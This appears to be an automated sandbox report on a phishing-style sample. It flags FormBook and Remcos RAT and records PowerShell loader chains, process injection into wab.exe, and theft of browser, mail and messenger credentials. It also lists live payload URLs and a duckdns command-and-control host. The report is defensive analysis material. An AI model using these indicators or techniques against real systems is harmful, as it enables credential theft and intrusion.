              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_23D72264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,10_2_23D72264
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,18_2_004082CD
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0041739B GetVersionExW,17_2_0041739B
              Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 00000020.00000002.4221469550.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.2815202339.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.4221200788.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000021.00000002.4222243357.00000000012D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.4220745067.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Yara detected Remcos RAT
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7328, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Windows\SysWOW64\relog.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
              Source: C:\Windows\SysWOW64\relog.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\relog.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\relog.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\relog.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\relog.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Windows\SysWOW64\relog.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Windows\SysWOW64\relog.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Tries to steal Instant Messenger accounts or passwords
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Source: C:\Windows\SysWOW64\relog.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
              Tries to steal Mail credentials (via file registry)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: ESMTPPassword18_2_004033F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword18_2_00402DB3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword18_2_00402DB3
              Yara detected WebBrowserPassView password recovery tool
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7328, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7588, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 00000020.00000002.4221469550.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.2815202339.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.4221200788.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000021.00000002.4222243357.00000000012D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.4220745067.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Yara detected Remcos RAT
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7328, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information112
              Scripting              		Valid Accounts1
              Windows Management Instrumentation              		112
              Scripting              		1
              Abuse Elevation Control Mechanism              		11
              Deobfuscate/Decode Files or Information              		1
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		3
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts11
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Abuse Elevation Control Mechanism              		11
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol1
              Data from Local System              		21
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		11
              Registry Run Keys / Startup Folder              		1
              Access Token Manipulation              		2
              Obfuscated Files or Information              		2
              Credentials in Registry              		2
              File and Directory Discovery              		SMB/Windows Admin Shares1
              Email Collection              		4
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts312
              Command and Scripting Interpreter              		Login Hook412
              Process Injection              		1
              Software Packing              		1
              Credentials In Files              		129
              System Information Discovery              		Distributed Component Object Model11
              Input Capture              		15
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud Accounts2
              PowerShell              		Network Logon Script11
              Registry Run Keys / Startup Folder              		1
              DLL Side-Loading              		LSA Secrets151
              Security Software Discovery              		SSH2
              Clipboard Data              		Fallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Masquerading              		Cached Domain Credentials41
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Modify Registry              		DCSync4
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
              Virtualization/Sandbox Evasion              		Proc Filesystem1
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Access Token Manipulation              		/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron412
              Process Injection              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1500456 Sample: PO_GM_list_2808202420200318... Startdate: 28/08/2024 Architecture: WINDOWS Score: 100 78 iwarsut775laudrye2.duckdns.org 2->78 80 www.vendasnaweb1.com 2->80 82 22 other IPs or domains 2->82 106 Suricata IDS alerts for network traffic 2->106 108 Malicious sample detected (through community Yara rule) 2->108 110 Yara detected FormBook 2->110 114 11 other signatures 2->114 15 cmd.exe 1 2->15         started        signatures3 112 Uses dynamic DNS services 78->112 process4 signatures5 156 Suspicious powershell command line found 15->156 158 Wscript starts Powershell (via cmd or directly) 15->158 160 Obfuscated command line found 15->160 162 Very long command line found 15->162 18 powershell.exe 14 23 15->18         started        22 conhost.exe 15->22         started        process6 dnsIp7 84 avocaldoperu.com 104.21.62.202, 443, 49730, 49737 CLOUDFLARENETUS United States 18->84 116 Suspicious powershell command line found 18->116 118 Obfuscated command line found 18->118 120 Very long command line found 18->120 122 Found suspicious powershell code related to unpacking or dynamic code loading 18->122 24 powershell.exe 17 18->24         started        27 conhost.exe 18->27         started        29 cmd.exe 1 18->29         started        signatures8 process9 signatures10 146 Suspicious powershell command line found 24->146 148 Obfuscated command line found 24->148 150 Very long command line found 24->150 152 2 other signatures 24->152 31 wab.exe 8 16 24->31         started        36 cmd.exe 1 24->36         started        process11 dnsIp12 86 iwarsut775laudrye2.duckdns.org 172.111.137.132, 49738, 49739, 49740 SOFTLAYERUS United States 31->86 88 geoplugin.net 178.237.33.50, 49741, 80 ATOM86-ASATOM86NL Netherlands 31->88 74 C:\Users\user\AppData\Roaming\sfvnspt.dat, data 31->74 dropped 76 C:\Users\user\AppData\...\Andragendet8.vbs, ASCII 31->76 dropped 100 Maps a DLL or memory area into another process 31->100 102 Installs a global keyboard hook 31->102 38 wscript.exe 1 31->38         started        41 cmd.exe 1 31->41         started        43 wab.exe 1 31->43         started        45 3 other processes 31->45 104 Uses cmd line tools excessively to alter registry or file data 36->104 file13 signatures14 process15 signatures16 128 Suspicious powershell command line found 38->128 130 Wscript starts Powershell (via cmd or directly) 38->130 132 Obfuscated command line found 38->132 142 3 other signatures 38->142 47 powershell.exe 38->47         started        134 Uses cmd line tools excessively to alter registry or file data 41->134 51 reg.exe 1 1 41->51         started        53 conhost.exe 41->53         started        136 Tries to steal Instant Messenger accounts or passwords 43->136 138 Tries to harvest and steal browser information (history, passwords, etc) 43->138 140 Tries to steal Mail credentials (via file / registry access) 45->140 process17 dnsIp18 90 cpanel-adminhost.com 193.25.216.165, 49742, 49744, 80 LVLT-10753US Germany 47->90 92 Suspicious powershell command line found 47->92 94 Obfuscated command line found 47->94 96 Very long command line found 47->96 55 powershell.exe 47->55         started        58 conhost.exe 47->58         started        60 cmd.exe 47->60         started        98 Creates multiple autostart registry keys 51->98 signatures19 process20 signatures21 144 Writes to foreign memory regions 55->144 62 wab.exe 55->62         started        65 cmd.exe 55->65         started        process22 signatures23 154 Maps a DLL or memory area into another process 62->154 67 qeKrnFkDzDT.exe 62->67 injected 70 cmd.exe 62->70         started        process24 signatures25 124 Found direct / indirect Syscall (likely to bypass EDR) 67->124 126 Uses cmd line tools excessively to alter registry or file data 70->126 72 conhost.exe 70->72         started        process26

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              No Antivirus matches

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://www.imvu.comr0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              http://www.imvu.com0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://geoplugin.net/json.gp0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://login.yahoo.com/config/login0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              http://www.ebuddy.com0%URL Reputationsafe
              http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
              http://geoplugin.net/json.gp(0%Avira URL Cloudsafe
              https://avocaldoperu.com/0%Avira URL Cloudsafe
              https://avocaldoperu.com/Jouse1.pngamalsAffavocaldoperuone.com/Jouse1.png0%Avira URL Cloudsafe
              http://cpanel-adminhost.com/Stevns179.mix0%Avira URL Cloudsafe
              http://geoplugin.net/json.gp/0%Avira URL Cloudsafe
              http://www.atlpicsstudios.com/pbzm/0%Avira URL Cloudsafe
              https://avocaldoperu.com/Jouse4.png0%Avira URL Cloudsafe
              http://www.katasoo.com/7qad/0%Avira URL Cloudsafe
              http://geoplugin.net/json.gpg0%Avira URL Cloudsafe
              https://www.google.com0%Avira URL Cloudsafe
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
              http://avocaldoperu.com0%Avira URL Cloudsafe
              http://geoplugin.net/json.gpn.net/json.gp0%Avira URL Cloudsafe
              https://github.com/Pester/Pester0%Avira URL Cloudsafe
              http://www.shabygreen.top/r9e8/0%Avira URL Cloudsafe
              https://avocaldoperu.com/Jouse1.png0%Avira URL Cloudsafe
              http://www.nirsoft.net0%Avira URL Cloudsafe
              http://www.411divorce.com/hxac/0%Avira URL Cloudsafe
              http://www.martinminorgroup.com/oyqt/0%Avira URL Cloudsafe
              https://aka.ms/pscore6lBdq0%Avira URL Cloudsafe
              https://www.google.com/accounts/servicelogin0%Avira URL Cloudsafe
              https://avocaldoperuone.com/Jouse4.png0%Avira URL Cloudsafe
              https://avocaldoperu.com0%Avira URL Cloudsafe
              http://cpanel-adminhost.com/wWdnBiepyw166.bin0%Avira URL Cloudsafe
              http://geoplugin.net/json.gpX0%Avira URL Cloudsafe
              http://www.nirsoft.net/0%Avira URL Cloudsafe
              http://www.vendasnaweb1.com/jk4m/0%Avira URL Cloudsafe
              http://www.gtprivatewealth.com/4d31/0%Avira URL Cloudsafe
              http://www.openhandedvision.com/ehr0/0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              avocaldoperu.com
              		104.21.62.202
              		truefalse
                		unknown
                ctorq.net
                		3.33.130.190
                		truetrue
                  		unknown
                  kera333.org
                  		64.46.102.70
                  		truetrue
                    		unknown
                    geoplugin.net
                    		178.237.33.50
                    		truefalse
                      		unknown
                      gtprivatewealth.com
                      		3.33.130.190
                      		truetrue
                        		unknown
                        cpanel-adminhost.com
                        		193.25.216.165
                        		truefalse
                          		unknown
                          td-ccm-neg-87-45.wixdns.net
                          		34.149.87.45
                          		truetrue
                            		unknown
                            vendasnaweb1.com
                            		162.241.2.92
                            		truetrue
                              		unknown
                              www.shabygreen.top
                              		203.161.41.205
                              		truetrue
                                		unknown
                                atlpicsstudios.com
                                		3.33.130.190
                                		truetrue
                                  		unknown
                                  411divorce.com
                                  		5.78.41.174
                                  		truetrue
                                    		unknown
                                    ghs.googlehosted.com
                                    		142.250.186.147
                                    		truefalse
                                      		unknown
                                      www.katasoo.com
                                      		188.114.96.3
                                      		truetrue
                                        		unknown
                                        iwarsut775laudrye2.duckdns.org
                                        		172.111.137.132
                                        		truetrue
                                          		unknown
                                          www.openhandedvision.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.vendasnaweb1.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.411divorce.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.ctorq.net
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.atlpicsstudios.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.martinminorgroup.com
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.kera333.org
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.gtprivatewealth.com
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown

                                                          Contacted URLs

                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://cpanel-adminhost.com/Stevns179.mixfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.atlpicsstudios.com/pbzm/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.katasoo.com/7qad/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://avocaldoperu.com/Jouse4.pngfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.shabygreen.top/r9e8/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.martinminorgroup.com/oyqt/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://geoplugin.net/json.gpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.411divorce.com/hxac/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://avocaldoperu.com/Jouse1.pngfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://cpanel-adminhost.com/wWdnBiepyw166.binfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.vendasnaweb1.com/jk4m/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.openhandedvision.com/ehr0/false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.gtprivatewealth.com/4d31/true
                                                          • Avira URL Cloud: safe
                                                          		unknown

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2469006444.0000020B6C824000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2199790164.000000000590C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://geoplugin.net/json.gp(wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.imvu.comrwab.exe, 0000000A.00000002.4244066662.0000000023D40000.00000040.10000000.00040000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://avocaldoperu.com/wab.exe, 0000000A.00000002.4221123486.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4221123486.0000000000AD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://geoplugin.net/json.gpgwab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://go.micropowershell.exe, 00000002.00000002.2361305747.0000020B5DA03000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://geoplugin.net/json.gp/wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
